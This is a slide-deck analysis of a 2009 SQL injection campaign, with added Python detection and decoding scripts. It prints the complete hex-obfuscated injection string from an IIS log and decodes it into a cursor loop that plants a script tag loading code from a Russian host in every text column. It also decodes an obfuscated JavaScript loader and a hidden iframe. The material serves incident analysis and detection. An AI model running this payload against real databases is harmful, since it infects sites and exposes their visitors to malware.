SQL Injection Attack Overview

Step by step analysis of a SQL Injection attack
   Code Obfuscation: a Definition
   IIS Log Entry
   Decoding the HEX Part 1
   SQL Injection Code
   Decoding the HEX Part 2
   Injected Code
   Where is this coming from?
Code Obfuscation: a Definition
   “Obfuscated code is source or machine code
    that has been made difficult to understand.
    Programmers may deliberately obfuscate code
    to conceal its purpose (a form of security
    through obscurity), to deter reverse
    engineering, or as a puzzle or recreational
    challenge for readers. Programs known as
    obfuscators transform human-readable code
    into obfuscated code using various techniques.”
    -Wikipedia

IIS Log Entry

This is the IIS log entry that is generated during the attack. In the next slide we remove the URL encoding and make the information highlighted in yellow (the injected query string) more readable.

   \\web101\Logs$\IIS\W3SVC1\u_ex090926.log:2009-09-26 16:41:23 W3SVC1 WEB101 1.1.1.1
    GET /client/file.asp adid=24&category=Texas+03-
    04%2F08;DECLARE%20@s%20VaRcHAr(4000);SET%20@S=casT(0x4445436C41724520405420
    5641524348617228323535292C406320566152436861522832353529206445636C4172652074614
    24C655F637552736F5220435552536F5220664F722053456C45437420412E6E616D652C622E6E6
    16D652046726F4D207379736F626A4543747320612C735973434F6C554D6E73206220776865726
    520412E49643D622E696420614E6420412E58547950453D27752720614E442028622E587479506
    53D3939206F5220622E58547970453D3335206F7220422E58747950653D323331204F7220422E5
    8745970453D31363729204F70456E207441426C455F435552734F72204645746348204E65787420
    46726F6D207441624C655F435572734F5220494E546F2040542C4063207768696C452840404645
    5463685F5354417455533D302920426567696E20457845632827557064615465205B272B40542B
    275D20534574205B272B40432B275D3D525452694D28434F6E5665727428564172434841522834
    303030292C5B272B40432B275D29292B4341535428305833433733363337323639373037343230
    3733373236333344363837343734373033413246324637373737373732453632363136453645363
    5373237343245373237353246363136343733324536413733334533433246373336333732363937
    3037343345206173207641524348417228353129292729204665746348204E6558742046524F4D2
    05441624C455F635572736F7220694E744F2040742C404320456E4420436C4F7365205441624C45
    5F437572736F72206445414C6C4F63415445205441424C655F435552736F5220%20aS%20varcH
    Ar(4000));exEc(@S);-- 80 - 123.204.243.229 HTTP/1.1
    Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - -
    www.domain.com 200 0 0 13542 1641 1015

IIS Log Entry - Removing URL Encoding

After removing the URL encoding and adding some line feeds we have the following code. The CAST statement converts the logged HEX string into a Variable Character Field (varchar). Next the EXEC command executes this decoded string.

/client/file.asp
adid=24&category=Texas 03-04/08;
DECLARE @s VaRcHAr(4000);
SET @S=casT(
0x4445436C417245204054205641524348617228323535292C40632056615243686152283235352
9206445636C417265207461424C655F637552736F5220435552536F5220664F722053456C454374
20412E6E616D652C622E6E616D652046726F4D207379736F626A4543747320612C735973434F6C
554D6E73206220776865726520412E49643D622E696420614E6420412E58547950453D27752720
614E442028622E58747950653D3939206F5220622E58547970453D3335206F7220422E58747950
653D323331204F7220422E58745970453D31363729204F70456E207441426C455F435552734F72
204645746348204E6578742046726F6D207441624C655F435572734F5220494E546F2040542C406
3207768696C4528404046455463685F5354417455533D302920426567696E204578456328275570
64615465205B272B40542B275D20534574205B272B40432B275D3D525452694D28434F6E56657
27428564172434841522834303030292C5B272B40432B275D29292B43415354283058334337333
6333732363937303734323037333732363333443638373437343730334132463246373737373737
3245363236313645364536353732373432453732373532463631363437333245364137333345334
3324637333633373236393730373433452061732076415243484172283531292927292046657463
48204E6558742046524F4D205441624C455F635572736F7220694E744F2040742C404320456E442
0436C4F7365205441624C455F437572736F72206445414C6C4F63415445205441424C655F435552
736F5220 aS varcHAr(4000));
exEc(@S);

CAST: Translates the HEX expression into a character string
EXEC: Executes this string
Here we decode the encoded HEX string into its ASCII equivalent. You can see that this code is an attempt to attack sysobjects and syscolumns, special tables within SQL Server. The query selects all user-defined tables and then limits it to columns with datatypes that can hold a string.

It then loops through all of these columns and appends a string to each row. Once again the string is encoded in HEX. We will apply the same decoding to it and look at the result in the next slide.

This code uses an interesting trick to avoid detection. The entire statement is in HEX, and I'd like to point out that the code uses a variety of upper and lower case characters. This causes the attack to vary significantly from attack to attack, and the code is also somewhat dynamic in nature.
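The mixed-case keywords and the HEX blob above are exactly what a log-review script has to normalise away before it can match anything. The following Python is an added example, not part of the original slides: it URL-decodes and case-folds the cs-uri-query field of IIS W3C log lines, flags the DECLARE / CAST(0x...) / EXEC pattern and reports the client IP. The field positions are assumed from the log entry shown earlier, and the sample log lines, the short stand-in payload and the RFC 5737 documentation IP addresses are constructed here rather than taken from the page.

```python
import re
from urllib.parse import unquote

# Case-insensitive markers of the DECLARE / CAST(0x...) / EXEC pattern seen in the log entry.
# Matching runs on the URL-decoded, lower-cased query string, so the attacker's mixed-case
# spelling (DECLARE, casT, exEc) and %20 padding no longer matter.
MARKERS = ("declare ", "cast(0x", "exec(")
LONG_HEX = re.compile(r"0x[0-9a-f]{40,}", re.IGNORECASE)   # a long hex literal is itself a signal

# Field positions assumed from the page's log entry (W3C extended format):
# date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip ...
FIELD_URI_STEM, FIELD_URI_QUERY, FIELD_CLIENT_IP = 6, 7, 10


def normalise_query(raw_query: str) -> str:
    """Undo '+' and percent-encoding (twice, to catch double encoding) and lower-case the result."""
    return unquote(unquote(raw_query.replace("+", " "))).lower()


def triage_query(raw_query: str) -> dict:
    """Report which markers fire and how many hex digits the longest 0x literal carries."""
    norm = normalise_query(raw_query)
    hits = [m for m in MARKERS if m in norm]
    blobs = LONG_HEX.findall(norm)
    longest = max((len(b) - 2 for b in blobs), default=0)   # digits only, without the 0x prefix
    return {"markers": hits, "hex_digits": longest,
            "suspicious": len(hits) >= 2 or longest > 0}


def find_injection_attempts(lines) -> list:
    """Return one record per log line whose query string looks like a cast-and-exec injection."""
    findings = []
    for line in lines:
        if not line or line.startswith("#"):   # skip blank lines and W3C '#Fields:' headers
            continue
        fields = line.split(" ")
        if len(fields) <= FIELD_CLIENT_IP:
            continue
        verdict = triage_query(fields[FIELD_URI_QUERY])
        if verdict["suspicious"]:
            findings.append({"client_ip": fields[FIELD_CLIENT_IP],
                             "uri_stem": fields[FIELD_URI_STEM], **verdict})
    return findings


# Constructed sample log. The payload mirrors the page's pattern with a short stand-in statement
# instead of the real 1184-digit blob; the client IPs are RFC 5737 documentation addresses.
INNER_STATEMENT = "UPDATE t SET c=c+'<script src=x></script>'"
PAYLOAD = ("DECLARE%20@s%20VaRcHAr(4000);SET%20@S=casT(0x" + INNER_STATEMENT.encode().hex().upper()
           + "%20aS%20varcHAr(4000));exEc(@S);--")
SAMPLE_LOG = [
    "#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) cs-host sc-status "
    "sc-substatus sc-win32-status sc-bytes cs-bytes time-taken",
    "2009-09-26 16:40:01 W3SVC1 WEB101 1.1.1.1 GET /client/file.asp adid=24&category=Texas+03-04%2F08 "
    "80 - 198.51.100.7 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0) - - www.domain.com 200 0 0 13542 1641 15",
    "2009-09-26 16:41:23 W3SVC1 WEB101 1.1.1.1 GET /client/file.asp adid=24&category=Texas+03-04%2F08;"
    + PAYLOAD +
    " 80 - 203.0.113.9 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0) - - www.domain.com 200 0 0 13542 1641 1015",
]

if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(hit)
```

Only the second data line is reported; the benign request with the same adid and category values is left alone because none of the markers survive normalisation and it carries no long hex literal.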


Decoding the HEX Part 1

0x4445436C41724520405420564152434861…

0x44 = 68 = D
0x45 = 69 = E
0x43 = 67 = C
0x6C = 108 = l
0x41 = 65 = A
0x72 = 114 = r
0x45 = 69 = E
0x20 = 32 = (space)
0x40 = 64 = @
0x54 = 84 = T
0x20 = 32 = (space)
0x56 = 86 = V
0x41 = 65 = A
0x52 = 82 = R
0x43 = 67 = C
0x48 = 72 = H
0x61 = 97 = a

Decoded statement:

DEClArE @T VARCHar(255),@c VaRChaR(255)
dEclAre taBLe_cuRsoR CURSoR
 fOr SElECt A.name,b.name FroM sysobjECts a, sYsCOlUMns b
 where A.Id=b.id aNd A.XTyPE='u' aND (b.XtyPe=99 oR b.XTypE=35 or B.XtyPe=231 Or B.XtYpE=167)
OpEn tABlE_CURsOr
FEtcH Next From tAbLe_CUrsOR INTo @T,@c
 whilE(@@FETch_STAtUS=0)
  Begin
   ExEc('UpdaTe ['+@T+']
    SEt ['+@C+']=
     RTRiM(COnVert(VArCHAR(4000),['+@C+']))+
     CAST(0X3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E
     as vARCHAr(51))')
   FetcH NeXt FROM TAbLE_cUrsor iNtO @t,@C
  EnD
ClOse TAbLE_Cursor
dEALlOcATE TABLe_CURsoR

sysobjects: Contains one row for each object (constraint, default, log, rule, stored procedure, and so on) created within a database.

syscolumns: Contains one row for every column in every table and view, and a row for each parameter in a stored procedure. This table is in each database.

XType:
U = User table
35 = text
99 = ntext
167 = varchar
231 = nvarchar
Using the same method as before we very easily determine that the injected string is a script tag pointing to ads.js. I have also experienced changes to this URL from attack to attack. I have decoded about four different locations for ads.js as of this writing.


Decoding the HEX Part 2

0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E

<script src=http://www.bannert.ru/ads.js></script>
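Both decoding slides apply the same step, reading a 0x... literal as bytes, and the second slide applies it to a literal found inside the first result. The Python below is an added example, not code from the original slides, that automates this: it URL-decodes the logged query string, finds the first hex literal, decodes it, and repeats on the result until no literal remains. OUTER_HEX is the page's own blob from the "Removing URL Encoding" slide joined onto one string; the LOGGED_QUERY wrapper around it is reassembled from the log entry, and the function names are mine.

```python
import re
from urllib.parse import unquote

# The HEX argument of casT(...) from the decoded log entry on the page, joined onto one string.
OUTER_HEX = (
    "4445436C417245204054205641524348617228323535292C40632056615243686152283235352"
    "9206445636C417265207461424C655F637552736F5220435552536F5220664F722053456C454374"
    "20412E6E616D652C622E6E616D652046726F4D207379736F626A4543747320612C735973434F6C"
    "554D6E73206220776865726520412E49643D622E696420614E6420412E58547950453D27752720"
    "614E442028622E58747950653D3939206F5220622E58547970453D3335206F7220422E58747950"
    "653D323331204F7220422E58745970453D31363729204F70456E207441426C455F435552734F72"
    "204645746348204E6578742046726F6D207441624C655F435572734F5220494E546F2040542C406"
    "3207768696C4528404046455463685F5354417455533D302920426567696E204578456328275570"
    "64615465205B272B40542B275D20534574205B272B40432B275D3D525452694D28434F6E56657"
    "27428564172434841522834303030292C5B272B40432B275D29292B43415354283058334337333"
    "6333732363937303734323037333732363333443638373437343730334132463246373737373737"
    "3245363236313645364536353732373432453732373532463631363437333245364137333345334"
    "3324637333633373236393730373433452061732076415243484172283531292927292046657463"
    "48204E6558742046524F4D205441624C455F635572736F7220694E744F2040742C404320456E442"
    "0436C4F7365205441624C455F437572736F72206445414C6C4F63415445205441424C655F435552"
    "736F5220"
)

# Constructed: the cs-uri-query field as it appears in the log, with the blob put back in place.
LOGGED_QUERY = ("adid=24&category=Texas+03-04%2F08;DECLARE%20@s%20VaRcHAr(4000);SET%20@S=casT(0x"
                + OUTER_HEX + "%20aS%20varcHAr(4000));exEc(@S);--")

# T-SQL accepts 0x or 0X with digits in either case, so the regex is case-insensitive.
HEX_LITERAL = re.compile(r"0x([0-9a-f]+)", re.IGNORECASE)


def decode_hex_literal(digits: str) -> str:
    """Turn the digits of a 0x literal into text; an odd digit count means a truncated or mis-copied blob."""
    if len(digits) % 2:
        raise ValueError("hex literal has an odd number of digits: %d" % len(digits))
    return bytes.fromhex(digits).decode("latin-1")   # latin-1 maps every byte to a character


def peel_layers(text: str, max_depth: int = 5) -> list:
    """Find the first 0x literal, decode it, and repeat on the result. Returns the layers, outermost first."""
    layers = []
    current = text
    for _ in range(max_depth):           # bounded, so a self-referencing blob cannot loop forever
        match = HEX_LITERAL.search(current)
        if match is None:
            break
        current = decode_hex_literal(match.group(1))
        layers.append(current)
    return layers


def decode_logged_query(raw_query: str) -> list:
    """URL-decode the query string the way the slide did, then peel the nested hex layers."""
    return peel_layers(unquote(raw_query.replace("+", " ")))


if __name__ == "__main__":
    for depth, layer in enumerate(decode_logged_query(LOGGED_QUERY), 1):
        print("--- layer %d (%d characters) ---" % (depth, len(layer)))
        print(layer)
```

Layer 1 is the cursor loop shown on the "Decoding the HEX Part 1" slide and layer 2 is the script tag from this slide; the loop stops there because the script tag contains no further 0x literal.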
Since most of the code within ads.js is not utilized I'll stick with what is. The first part is an interesting way of hiding the write command. They utilize the replace function to remove the 5 from within the string literal, concealing it from detection. The two functions within the write statement are very similar so I will only explain one of them, but I will indicate where their differences are.


Injected Code – JavaScript

<script src=http://www.bannert.ru/ads.js></script>

document['wri5te'.replace(/[0-9]/,'')](RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq'));

Equivalent, once the 5 is stripped:

write(RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq'));
The first part of this function sets up some variables. These variables, however, are the only differences between the two functions: the first two are a decryption key and the last is the cipher text. Next it loops through the cipher text split on the commas. For example the first array element would be 90+0. The next step is, for each of these elements, to set up an array based on the split on the plus sign. It then performs the decryption mathematics and determines the resultant string.


Injected Code – JavaScript

Decoded output of the function (as shown, truncated, on the slide):
<iframe width=1 height=1 border=0 frameborder=0 s

function RfCEPXiV(KDZJF){
var Ffwx=6,
TMplSKEfAW=4;
var VhoWIRnEH='90+0,157+2,153+0,171+0,145+2,163+2,151+2,48+0,178+2,157+2,150+0,174+0,156+0,91+2,73+2,48+0,156+0,151+2,157+2,154+2,156+0,174+0,91+2,73+2,48+0,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,153+0,171+0,145+2,163+2,151+2,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,172+2,171+0,',
QlnGAowZ=VhoWIRnEH.split(',');          // Splits the string at the commas
gHuP='';
for(THLfo=0;THLfo<QlnGAowZ.length-1;THLfo++)
{
      MhbtCwq=QlnGAowZ[THLfo].split('+');   // Splits the string at the plus
      gAJys = parseInt(MhbtCwq[0]*TMplSKEfAW)+parseInt(MhbtCwq[1]);
      gAJys = parseInt(gAJys)/Ffwx;
      gHuP += String.fromCharCode(gAJys);
}
return gHuP;}

Worked decryption of the first elements (multiply by 4, add the offset, divide by 6):
90*4 + 0 = 360     360/6 = 60      60 = <
157*4 + 2 = 630    630/6 = 105     105 = i
153*4 + 0 = 612    612/6 = 102     102 = f
171*4 + 0 = 684    684/6 = 114     114 = r
145*4 + 2 = 582    582/6 = 97      97 = a
…
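To check the worked arithmetic on this slide and the wri5te trick on the previous one, here is an added Python port of the decoding loop; it is not the page's code and the function names are mine. It uses the cipher string from RfCEPXiV above with the same key (multiplier 4, divisor 6) and refuses any element that does not divide to a whole character code, which is what happens when a key is paired with the wrong string.

```python
import re

# Cipher string from the RfCEPXiV function shown above (the page's data), joined onto one line.
CIPHER_TEXT = (
    "90+0,157+2,153+0,171+0,145+2,163+2,151+2,48+0,178+2,157+2,"
    "150+0,174+0,156+0,91+2,73+2,48+0,156+0,151+2,157+2,154+2,156+0,174+0,91+2,"
    "73+2,48+0,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,153+0,171+0,"
    "145+2,163+2,151+2,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,172+2,"
    "171+0,"
)


def explain_token(token: str, multiplier: int = 4, divisor: int = 6) -> tuple:
    """One row of the worked table: (token, base*multiplier+offset, character code, character)."""
    base, offset = token.split("+")
    product = int(base) * multiplier + int(offset)
    code = product / divisor
    if code != int(code):
        # The real script never hits this; a wrong key would.
        raise ValueError("%r does not decode to a whole character code" % token)
    return token, product, int(code), chr(int(code))


def decode_pair_cipher(cipher: str, multiplier: int = 4, divisor: int = 6) -> str:
    """Port of the JS loop: split on ',', split each element on '+', then (a*4+b)/6 -> character.
    The trailing comma yields an empty last element, which the JS skips with length-1; we skip empties too."""
    return "".join(explain_token(t, multiplier, divisor)[3] for t in cipher.split(",") if t)


def unmask_property(obfuscated: str) -> str:
    """Mirror of 'wri5te'.replace(/[0-9]/,''): a JS replace without the g flag removes only the first match."""
    return re.sub(r"[0-9]", "", obfuscated, count=1)


if __name__ == "__main__":
    for token in CIPHER_TEXT.split(",")[:5]:
        print("%s -> %d -> %d -> %r" % explain_token(token))
    print(decode_pair_cipher(CIPHER_TEXT))
    print(unmask_property("wri5te"))
```

The port reproduces the slide's first five rows and yields the opening of the iframe tag, ending at "sr" exactly where the cipher string on the slide ends; the rest of the tag comes from the second function, whose only difference is its key and cipher text.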
The results from both functions together form an iframe which loads index.php. At this point I stopped my investigation, partly because the index.php file returned a Page Not Found error. As noted below there are three possible conditions at this point.


Injected Code – php & css

<iframe width=1 height=1 border=0 frameborder=0 src='http://ads-t.ru/ad/index.php'></iframe>

Index.php simulates an 'Error 404 - Page Not Found' page; however, it has custom JavaScript as well as a cascading style sheet which specifies background images.

One of three conditions exists:
   This site has been identified as malicious and has been removed by the hosting provider.
   The images specified in the CSS could be malicious in nature.
   They have not activated the malicious code and could do so at any time.
By performing a WhoIs on the source address identified in the IIS logs we can determine that this particular attack originated from Taiwan. IP addresses for other attacks varied in origin; however, so far all have originated from Asia. After some communications with the Internet Storm Center I was provided with a link to a site diary entry from April 16, 2008. The handlers at the ISC actually have the code (apparently written in Chinese) that utilizes Google to identify sites that are vulnerable to this attack and then executes the attack against them. The program performs a Google search for a string that would indicate a vulnerable site.

Where is this coming from?

Source address from the IIS log entry: 123.204.243.229

inetnum:     123.204.0.0 - 123.205.255.255
netname:     SEEDNET-NET
descr:       Digital United Inc.
descr:       7F,220,gangchi road
descr:       Taipei Taiwan 114
country:     TW
admin-c:     MC37-AP
tech-c:      MC37-AP
status:      ALLOCATED PORTABLE
notify:      michaelc@du.net.tw
mnt-by:      MAINT-TW-TWNIC
mnt-lower:   MAINT-TW-TWNIC
mnt-routes:  MAINT-TW-TWNIC
remarks:     -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks:     This object can only be updated by APNIC hostmasters.
remarks:     To update this object, please contact APNIC
remarks:     hostmasters and include your organisation's account
remarks:     name in the subject line.
remarks:     -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed:     hm-changed@apnic.net 20061228
source:      APNIC
SQL Injection Attack Overview

Thank you for watching
Fred Stuck

				
Posted: 3/8/2010 (12 pages)